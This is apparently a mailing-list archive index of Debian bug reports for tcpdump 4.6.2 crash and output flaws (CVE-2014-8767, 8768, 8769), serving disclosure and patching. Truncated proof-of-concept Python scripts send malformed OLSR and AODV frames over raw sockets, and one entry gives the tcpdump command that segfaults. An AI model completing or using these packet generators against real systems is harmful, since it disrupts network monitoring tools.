Bug#770415: Bug#770434: CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload, Bug#770424: CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload, Bug#7704

2014-11-21 Thread Nguyen Cong
Thanks for your information. I already try on master branch of tcpdump on github, it seems that they haven't fixed it yet. Still see segfault message on dmesg. On 21/11/2014 16:10, Romain Francoise wrote: Thanks. Upstream doesn't seem to have released official patches yet, or if they have they

Bug#770434: CVE-2014-8767 tcpdump denial of service in verbose mode using malformed OLSR payload

2014-11-21 Thread Nguyen Cong
Package: tcpdump Version: 4.6.2 tags: Security Use following script for generate packet: #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d

Bug#770424: CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload

2014-11-20 Thread Nguyen Cong
Package: tcpdump Version: 4.6.2 tags: Security Using following script to generate packet: #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x

Bug#770415: tcpdump denial of service in verbose mode using malformed Geonet payload

2014-11-20 Thread Nguyen Cong
Package: tcpdump Version: 4.6.2 tags: Security #sudo tcpdump -i lo -s 0 -n -v This cause segfault on tcpdump. This bug reports as CVE-2014-8768. Propose patch is in attached file. The credit belong to Steffen Bauch Twitter: @steffenbauch http://steffenbauch.de Original report in bugtraq: http: